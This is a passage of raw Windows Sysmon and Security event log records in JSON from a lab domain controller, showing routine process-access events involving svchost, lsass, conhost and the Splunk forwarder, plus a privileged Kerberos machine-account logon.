+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.276\r\nSourceProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nSourceProcessId: 3068\r\nSourceThreadId: 3868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.276","SourceProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","SourceProcessId":"3068","SourceThreadId":"3868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.291\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.291","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.291\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.291","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220395,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5FD55\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5fd55","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220396,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5FD55\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52592\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 